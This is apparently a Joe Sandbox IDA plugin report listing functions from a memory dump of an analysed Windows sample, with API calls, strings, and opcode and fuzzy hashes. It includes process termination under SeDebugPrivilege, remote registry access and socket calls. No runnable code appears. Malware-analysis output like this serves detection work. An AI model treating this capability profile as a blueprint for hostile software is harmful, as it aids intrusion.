LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0105DB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0105DB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0105DB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0105DB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0105DB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00FFA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0105DBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0105DBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00FFA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0105DBC8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 442944193fc212f4becc02096b9d5cb952962f122f4a751bf4e6da33a07a461b
Instruction ID: b8231eee64349a41bcb85aa4f007fa9b8fee0c2bd91a4659cdcf5105a47dbee4
Opcode Fuzzy Hash: 442944193fc212f4becc02096b9d5cb952962f122f4a751bf4e6da33a07a461b
Instruction Fuzzy Hash: CC517E71600209EFEB60DFA8CC81FAA77F5AF48750F100519FA8AD72A0D7B5A980DB51

Function 01027555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 01026EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01025FA6,?), ref: 01026ED8

Part of subcall function 01026EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01025FA6,?), ref: 01026EF1

Part of subcall function 010272CB: GetFileAttributesW.KERNEL32(?,01026019), ref: 010272CC

lstrcmpiW.KERNEL32(?,?), ref: 010275CA
_wcscmp.LIBCMT ref: 010275E2
MoveFileW.KERNEL32(?,?), ref: 010275FB

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 50eada60a318db4645cb46ffa2cb91ebacfc2e0df160530dac1fa41f841ed8a0
Instruction ID: cedd24d9a19c9c389c5463dd26a294f20d2ef654954ad0aa1e0b16bae5c94a9a
Opcode Fuzzy Hash: 50eada60a318db4645cb46ffa2cb91ebacfc2e0df160530dac1fa41f841ed8a0
Instruction Fuzzy Hash: 765101B2A0522A9ADF65EB94D844DDE73BCAF1C210F0040EAF685E3140EA75D7C9CB64

Function 00FFEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0105DAD1,00000004,00000000,00000000), ref: 00FFEAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0105DAD1,00000004,00000000,00000000), ref: 00FFEB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0105DAD1,00000004,00000000,00000000), ref: 0105DC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0105DAD1,00000004,00000000,00000000), ref: 0105DCF2

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: c18f52bafceff5ae9a46f60fee33e4c0dbab9c41046ccfbefcd484480b8206e8
Instruction ID: 44d8c76382dea7f8b78aa6c78d1bcf645e8a7ece6f3a4be9c5397370e5bad141
Opcode Fuzzy Hash: c18f52bafceff5ae9a46f60fee33e4c0dbab9c41046ccfbefcd484480b8206e8
Instruction Fuzzy Hash: 3C412371B08689DAD7794B68898CB3B7E96BFD5320F19080EF3C786671C679B840E311

Function 0101B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0101AEF1,00000B00,?,?), ref: 0101B26C
HeapAlloc.KERNEL32(00000000,?,0101AEF1,00000B00,?,?), ref: 0101B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0101AEF1,00000B00,?,?), ref: 0101B288
GetCurrentProcess.KERNEL32(?,00000000,?,0101AEF1,00000B00,?,?), ref: 0101B290
DuplicateHandle.KERNEL32(00000000,?,0101AEF1,00000B00,?,?), ref: 0101B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0101AEF1,00000B00,?,?), ref: 0101B2A3
GetCurrentProcess.KERNEL32(0101AEF1,00000000,?,0101AEF1,00000B00,?,?), ref: 0101B2AB
DuplicateHandle.KERNEL32(00000000,?,0101AEF1,00000B00,?,?), ref: 0101B2AE
CreateThread.KERNEL32(00000000,00000000,0101B2D4,00000000,00000000,00000000), ref: 0101B2C8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 72fc39c8b04160f70308d509910acfa1d2100c1db3fbb06fed88b233290b8411
Instruction ID: 8e10b164f1fbbd7a84a4ddcbe3834f83ce31a303bf135f586a07e6de7d936cb3
Opcode Fuzzy Hash: 72fc39c8b04160f70308d509910acfa1d2100c1db3fbb06fed88b233290b8411
Instruction Fuzzy Hash: 5201BBB5340344BFE720AFA5DC49F6B7BACEB89711F018411FA85DB1A5CAB99800CB60

Function 0103C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0103C876, 0103C887
Not an Object type, xrefs: 0103C49E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: b0f4f099dbd039e539e0af3cf34bae0c7b3afa776388a50893444c11634c4fd5
Instruction ID: 5457c97805e0b26e20d1ebf7d523a493934a436bcecfd7ea5b021ca520f876c3
Opcode Fuzzy Hash: b0f4f099dbd039e539e0af3cf34bae0c7b3afa776388a50893444c11634c4fd5
Instruction Fuzzy Hash: 23E19671A00219ABEF15DFA8C944AEE77F9FF88354F14406AE985FB281D770AD41CB90

Function 0103BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0103BB5C
VariantInit.OLEAUT32(?), ref: 0103BC2D
VariantInit.OLEAUT32(?), ref: 0103BD2E
VariantClear.OLEAUT32(?), ref: 0103BD38
VariantClear.OLEAUT32(?), ref: 0103BD99

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0103BD11
Null Object assignment in FOR..IN loop, xrefs: 0103BBBD, 0103BCEB, 0103BDA7

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 3085cf72350ed343a17f134e723407c8e3c460a7ad462fffb3de1618a1806105
Instruction ID: 193842c6a044bd2f7d73cc0a4087aad3b62c7638bc202d6e14c0cd41e36e86b7
Opcode Fuzzy Hash: 3085cf72350ed343a17f134e723407c8e3c460a7ad462fffb3de1618a1806105
Instruction Fuzzy Hash: 3B91B571A00219ABDF24DFA9C848FEEBBBCEF85714F008159F595AB181DB709940CFA0

Function 00FE86C2 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 155COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FE7DBD

Strings

^, xrefs: 00FE7D96
], xrefs: 00FE7D9F
\, xrefs: 00FE7D89
Q\E, xrefs: 00FE86D6
\, xrefs: 00FE7E1D
[, xrefs: 00FE7E14

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$\$\$]$^
API String ID: 2102423945-1026548749
Opcode ID: ca9b29692a4c6049a35fd585dec3b1b7cd01782d883031c972b859316890753d
Instruction ID: 69968ce8cded61192ea998ce458cea0fd8309fd293a495f3458a24027bc42582
Opcode Fuzzy Hash: ca9b29692a4c6049a35fd585dec3b1b7cd01782d883031c972b859316890753d
Instruction Fuzzy Hash: 3951B271D003899BDF64DF99C8806AEBBB2FF84324F288166D958B7351E7349D85DB80

Function 01049A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01049B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 01049B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01049B47
_wcscat.LIBCMT ref: 01049BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 01049BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 01049BE7

Strings

SysListView32, xrefs: 01049AEB

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: df07cc7bb14543bb21af9f804b0593522ace68206d7d694b61c2ce702400efdc
Instruction ID: 6b41117315f766634ebe20b377cf0b7bbbd605f8d3192c4f0b4bd4043101fcc3
Opcode Fuzzy Hash: df07cc7bb14543bb21af9f804b0593522ace68206d7d694b61c2ce702400efdc
Instruction Fuzzy Hash: 6E4192B0940309ABEF229FA8C884BEF77E8EF0C354F00447AF5C5E7191C67599848B50

Function 0104172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 01026532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 01026554
Part of subcall function 01026532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 01026564
Part of subcall function 01026532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 010265F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0104179A
GetLastError.KERNEL32 ref: 010417AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 010417D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 01041855
GetLastError.KERNEL32(00000000), ref: 01041860
CloseHandle.KERNEL32(00000000), ref: 01041895

Strings

SeDebugPrivilege, xrefs: 010417B8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: fd1b3a7d42b8efb3ddda8e308db91edac322e8053b06196863454625c47c0bfe
Instruction ID: 0cb6aa09c5cd1c6d2711db79bd6f5eb2bc0dd611d08f883c80b6bd752454103d
Opcode Fuzzy Hash: fd1b3a7d42b8efb3ddda8e308db91edac322e8053b06196863454625c47c0bfe
Instruction Fuzzy Hash: 8541C071700201AFEB15EF54CCD5FAD77A1AF54310F0580A8FA869F2D2DBB9A9408B50

Function 01025819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 010258B8

Strings

warning, xrefs: 010258A1
stop, xrefs: 01025889
question, xrefs: 01025871
info, xrefs: 01025859
blank, xrefs: 0102583A

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 4398bec0a8c69dd4f9be7971dcaa8575605bcd9dfcef9399641f14aea238b21f
Instruction ID: cbd2bbc567fc352cfdfcc6d252c6370f2bb445ef96b6c5cb06871a38c71fb868
Opcode Fuzzy Hash: 4398bec0a8c69dd4f9be7971dcaa8575605bcd9dfcef9399641f14aea238b21f
Instruction Fuzzy Hash: FD11083530D352BAEB025A659C81DEE27ECAF1A254F10007EF5C0F92C1E7E0A50046AD

Function 0102A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0102A806

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 8e26381febf3d5811ca37d563a12a237d6cd61b647ddca2a6af6220eb401c276
Instruction ID: 876f0127f35defeedede4c1864daf3e0710b5464ce216686e8afbfbb409fb73a
Opcode Fuzzy Hash: 8e26381febf3d5811ca37d563a12a237d6cd61b647ddca2a6af6220eb401c276
Instruction Fuzzy Hash: AAC17075A0022ADFDB10CF98C480BAEBBF4FF08315F20446AE685E7651DB35A941CBA0

Function 01026B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 01026B63
LoadStringW.USER32(00000000), ref: 01026B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 01026B80
LoadStringW.USER32(00000000), ref: 01026B87
_wprintf.LIBCMT ref: 01026BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 01026BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 01026BA8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 0866b7fef8406d503a50d22c173ccf9f880523c12797ef4b274dfd343153fc77
Instruction ID: 8acc6e14eb25ce6f05d662a0a5fab29f9336912de5e551ff7272d7347c7a1eb7
Opcode Fuzzy Hash: 0866b7fef8406d503a50d22c173ccf9f880523c12797ef4b274dfd343153fc77
Instruction Fuzzy Hash: 3B0112F6900258BFEB11A7E49D89EE6776CE708304F004495F7C5E6045EA759E844F74

Function 01042B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01043C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01042BB5,?,?), ref: 01043C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01042BF6

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 0c7855889f7f74c6bc63ace8f34e16c29c0c9838ce92c663df7d7ed9d695d8dc
Instruction ID: 9302cc5fc1a6c1e998d567c82f577819e2e7548c8414fe5c1e543f04f48f0fa1
Opcode Fuzzy Hash: 0c7855889f7f74c6bc63ace8f34e16c29c0c9838ce92c663df7d7ed9d695d8dc
Instruction Fuzzy Hash: F1919BB12042019FDB10EF59C884B6EB7E4FF88310F04886DFAD69B2A1DB75E905DB42

Function 010395BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 01039691
WSAGetLastError.WSOCK32(00000000), ref: 0103969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 010396C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 010396E9
WSAGetLastError.WSOCK32(00000000), ref: 010396F8
htons.WSOCK32(?,?,?,00000000,?), ref: 010397AA
inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0107DC00), ref: 01039765

Part of subcall function 0101D2FF: _strlen.LIBCMT ref: 0101D309

_strlen.LIBCMT ref: 01039800

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ErrorLast_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3480843537-0
Opcode ID: 5b1d807c4a108e271352e82b8d5451439b0ba69738a9f5dd4fb66b83629cacfa
Instruction ID: 67985c0fe38e15c81ec2b2bfb286eb07c5dc774454a1a29a61da10002a9ca47a
Opcode Fuzzy Hash: 5b1d807c4a108e271352e82b8d5451439b0ba69738a9f5dd4fb66b83629cacfa
Instruction Fuzzy Hash: 2F81AD31504240ABD714EF69DC85E6FBBE8EFC8714F004A1DF6959B2A1EB74D904CB92

Function 0100A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 0100A991

Part of subcall function 01007D7C: __FF_MSGBANNER.LIBCMT ref: 01007D91
Part of subcall function 01007D7C: __NMSG_WRITE.LIBCMT ref: 01007D98
Part of subcall function 01007D7C: __malloc_crt.LIBCMT ref: 01007DB8

__lock.LIBCMT ref: 0100A9A4
__lock.LIBCMT ref: 0100A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,01096DE0,00000018,01015E7B,?,00000000,00000109), ref: 0100AA0C
EnterCriticalSection.KERNEL32(8000000C,01096DE0,00000018,01015E7B,?,00000000,00000109), ref: 0100AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 0100AA39

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: a2cc46420f0d49978069b128e25ec0756c5c0514f21c440a337c49435931d467
Instruction ID: 2accb722adb435a41657d9fe8d2bae0348951bdd588df72f192ab2a7935c14aa
Opcode Fuzzy Hash: a2cc46420f0d49978069b128e25ec0756c5c0514f21c440a337c49435931d467
Instruction Fuzzy Hash: C3411671B00706DFFB269FACD64479CBBA0AF02334F148268E4E5AB2D1D7799581CB90

Function 01048ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 01048EE4
GetDC.USER32(00000000), ref: 01048EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 01048EF7
ReleaseDC.USER32(00000000,00000000), ref: 01048F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 01048F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01048F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0104BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 01048F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01048FAA

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: b717c5d4e11a239f501bcd102f680628818bd6b48561b2ea99f09164e264b813
Instruction ID: 5017da3884cfa565a513f1c8646dfc6b26f715822d47405eba75e2b71d41b854
Opcode Fuzzy Hash: b717c5d4e11a239f501bcd102f680628818bd6b48561b2ea99f09164e264b813
